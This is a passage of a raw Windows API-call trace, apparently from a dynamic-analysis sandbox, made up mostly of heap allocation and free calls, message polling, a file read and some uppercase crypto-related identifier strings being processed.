RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0177.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0177.855] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0177.855] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0177.855] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0177.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0177.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0177.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0177.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0177.856] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0177.856] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x2691, lpOverlapped=0x0) returned 1 [0177.858] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0177.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0177.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2691) returned 0x900450 [0177.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0177.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0177.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0177.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2691) returned 0x902af0 [0177.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900450 | out: hHeap=0x8a0000) returned 1 [0177.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.859] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0177.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2691) returned 0x900450 [0177.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900450 | out: hHeap=0x8a0000) returned 1 [0177.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0177.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.860] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0177.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0177.860] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.860] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0177.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2691) returned 0x900450 [0177.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0177.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28e8 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0177.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2768 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0177.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba288 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0177.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2691) returned 0xbea018 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0177.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0177.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0177.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0177.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0177.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.863] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0177.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27a8 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0177.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0177.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.864] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0177.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0177.864] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0177.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0177.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0177.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0177.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0177.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0177.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0177.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0177.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.865] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0177.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0177.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0177.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0177.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0177.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0177.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0177.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0177.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0177.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0177.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0177.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0177.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0177.866] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0177.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0177.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0177.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0177.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0177.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0177.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.866] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0177.867] PeekMessageW (in: 